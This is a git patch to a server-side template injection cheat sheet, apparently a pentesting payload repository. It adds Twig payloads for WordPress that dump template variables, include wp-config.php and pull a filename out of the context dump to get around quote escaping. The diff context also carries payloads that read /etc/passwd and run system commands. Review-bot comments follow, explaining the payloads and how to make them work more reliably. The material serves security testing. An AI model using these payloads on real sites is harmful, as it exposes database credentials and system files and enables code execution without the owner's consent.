From 33d632df4eb18570de8fbb23c43cd826d2d70df7 Mon Sep 17 00:00:00 2001 From: "s. vewa" Date: Sun, 24 Jul 2022 12:30:09 +0200 Subject: [PATCH] Twig in Wordpress Was very unsuccessful with the given Twig examples, quotes were escaped so got invalid, file_excerpt threw an error, too. Include and also injecting the file name helped. Don't know if this is a wordpress thing... --- Server Side Template Injection/README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 21f76c1..c9eb88e 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine. {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} +{{dump(_context)}} {{app.request.server.all|join(',')}} ``` @@ -796,6 +797,7 @@ $output = $twig > render ( ```python "{{'/etc/passwd'|file_excerpt(1,30)}}"@ +{{include("wp-config.php")}} ``` ### Twig - Code execution @@ -809,6 +811,12 @@ $output = $twig > render ( {{['cat$IFS/etc/passwd']|filter('system')}} ``` +Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) + +```python +FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }} +``` + Example with an email passing FILTER_VALIDATE_EMAIL PHP. ```powershell
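Review bot: the `{{dump(_context)}}` line added in the first hunk (right after `{{dump(app)}}`) lands in the list without any hint of why it is different from the `dump(app)` line above it. `_context` is Twig's built-in variable holding every variable visible to the current template, so this one call shows all of them and is the quickest way to see under which name the injected input arrived; that is the reason to list it and it should be said in a trailing comment, e.g. `{{dump(_context)}} # dump every variable in the template scope`. Since `dump` comes from Twig's Debug extension and is only available when that extension is enabled, a blank or errored response to this probe does not rule out SSTI, which is worth one more clause on the same line so readers do not stop testing too early.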
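Review bot: the `{{include("wp-config.php")}}` payload added in the second hunk needs a note that the argument is resolved through the Twig loader, not as a filesystem path: `include()` asks the environment's configured loader for a template of that name and renders it, so the file is only reachable if the loader can locate it (for a filesystem loader, relative to its template directories) and the output is the file rendered as a template rather than read raw. The commit message explains that this is what worked on a WordPress target where `file_excerpt` threw an error, and that context belongs in the README next to the payload, for example `{{include("wp-config.php")}} # loader-relative; rendered, not raw; worked where file_excerpt was unavailable`. Without it a reader cannot tell why this line sits beside the `file_excerpt` one or when to prefer each.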
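Review bot: the paragraph introduced in the third hunk ("Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)") reads as if OFFSET and LENGTH point into the request parameter, but they index into the string returned by `dump(_context)`, which wraps the injected value in var_dump-style output (variable names, types, lengths). The offsets therefore depend on the target's context and on the length of the payload itself, and must be measured from a preceding `{{dump(_context)}}` response; `[OFFSET:LENGTH]` is Twig's slice shorthand where the second number is a length rather than an end index. Suggest rewording along the lines of "Use when quotes are escaped or filtered: put the filename at the start of the payload and slice it back out of the context dump with `[OFFSET:LENGTH]` (offset and length measured in a prior `{{dump(_context)}}` response)", and stating that `dump` must be available for this to work at all. One more point on placement: this hunk lands under `### Twig - Code execution`, directly after the `filter('system')` payload, although it is a file-inclusion variant of the `include()` line from the second hunk; it would read better in the same section as that line.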